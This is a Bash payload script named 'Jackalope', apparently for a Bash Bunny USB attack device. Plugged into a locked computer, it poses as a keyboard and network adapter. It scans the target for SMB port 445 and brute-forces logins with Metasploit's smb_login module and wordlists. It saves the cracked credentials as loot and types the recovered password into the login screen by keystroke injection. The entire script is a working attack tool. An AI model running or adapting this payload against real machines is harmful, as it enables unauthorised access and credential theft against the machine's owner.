117 lines
2.4 KiB
Bash
117 lines
2.4 KiB
Bash
#!/bin/bash
|
|
#
|
|
# Title: Jackalope
|
|
# Author: catatonic
|
|
# Version: 1.1.0
|
|
|
|
# Check readiness & prepare environment
|
|
LED SETUP
|
|
|
|
REQUIRETOOL metasploit-framework
|
|
ATTACKMODE HID RNDIS_ETHERNET
|
|
|
|
# Ensure loot is available for recording results.
|
|
mount /dev/nandf /root/udisk/
|
|
|
|
ORIGINAL_SWITCH=$SWITCH_POSITION
|
|
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
|
|
LOOTBASE=/root/udisk/loot/Jackalope/
|
|
|
|
# SETUP
|
|
GET TARGET_IP
|
|
GET TARGET_HOSTNAME
|
|
|
|
COUNT=$(ls -lad $LOOTBASE/$TARGET_HOSTNAME* | wc -l)
|
|
COUNT=$((COUNT+1))
|
|
LOOTDIR=$LOOTBASE/$TARGET_HOSTNAME-$COUNT
|
|
mkdir -p $LOOTDIR
|
|
|
|
MSF_DIR=/tools/metasploit-framework
|
|
|
|
# Save environment information:
|
|
echo "PAYLOAD_DIR: $PAYLOAD_DIR" >> $LOOTDIR/log.txt
|
|
echo "MSF_DIR: $MSF_DIR" >> $LOOTDIR/log.txt
|
|
echo "LOOTDIR: $LOOTDIR" >> $LOOTDIR/log.txt
|
|
echo "TARGET_IP: $TARGET_IP" >> $LOOTDIR/log.txt
|
|
echo "TARGET_HOSTNAME: $TARGET_HOSTNAME" >> $LOOTDIR/log.txt
|
|
|
|
SYNC ()
|
|
{
|
|
sync; sleep 1; sync
|
|
}
|
|
CLEAR_PW()
|
|
{
|
|
LED SPECIAL
|
|
rm $PAYLOAD_DIR/quack_pass.txt
|
|
SYNC
|
|
WAIT
|
|
}
|
|
ENTER_PW()
|
|
{
|
|
sleep 1
|
|
QUACK $ORIGINAL_SWITCH/quack_pass.txt
|
|
QUACK ENTER
|
|
}
|
|
RECON()
|
|
{
|
|
ATTACKMODE RNDIS_ETHERNET
|
|
# Stage 1: Recon
|
|
LED STAGE1
|
|
echo "Executing nmap..." >> $LOOTDIR/log.txt
|
|
nmap -p 445 -Pn $TARGET_IP > $LOOTDIR/nmap_results.txt
|
|
if ! grep --quiet "445.*open" $LOOTDIR/nmap_results.txt;
|
|
then
|
|
LED FAIL2
|
|
SYNC
|
|
exit
|
|
fi
|
|
}
|
|
EXPLOIT()
|
|
{
|
|
# Stage 2: Exploit
|
|
LED STAGE2
|
|
export HOME=/root
|
|
cd $MSF_DIR
|
|
./msfconsole -q -x "use auxiliary/scanner/smb/smb_login; set RHOSTS $TARGET_IP; set USER_FILE $PAYLOAD_DIR/userlist.txt; set PASS_FILE $PAYLOAD_DIR/wordlist.txt; run; exit" > $LOOTDIR/msfconsole.txt
|
|
|
|
if ! grep --quiet "^\[+\]" $LOOTDIR/msfconsole.txt;
|
|
then
|
|
LED FAIL
|
|
echo "Payload failed, no logins found..." >> $LOOTDIR/log.txt
|
|
SYNC
|
|
exit
|
|
fi
|
|
|
|
grep "^\[+\]" $LOOTDIR/msfconsole.txt | grep -o \'.*\' | cut -d ':' -f 1 | cut -d "'" -f 2 > $LOOTDIR/user.txt
|
|
grep "^\[+\]" $LOOTDIR/msfconsole.txt | grep -o \'.*\' | cut -d ':' -f 2 | cut -d "'" -f 1 > $LOOTDIR/password.txt
|
|
|
|
# Focus needs to be set on the password field manually.
|
|
echo -n "STRING " > $PAYLOAD_DIR/quack_pass.txt
|
|
cat $LOOTDIR/password.txt >> $PAYLOAD_DIR/quack_pass.txt
|
|
|
|
SYNC
|
|
}
|
|
|
|
# High level view.
|
|
while true
|
|
do
|
|
if [ -f $PAYLOAD_DIR/quack_pass.txt ];
|
|
then
|
|
LED FINISH
|
|
else
|
|
RECON
|
|
EXPLOIT
|
|
continue
|
|
fi
|
|
|
|
WAIT
|
|
|
|
# User's choice, clear old password or enter password.
|
|
if [ "$SWITCH_POSITION" == "switch3" ];
|
|
then
|
|
CLEAR_PW
|
|
else
|
|
ENTER_PW
|
|
fi
|
|
done
|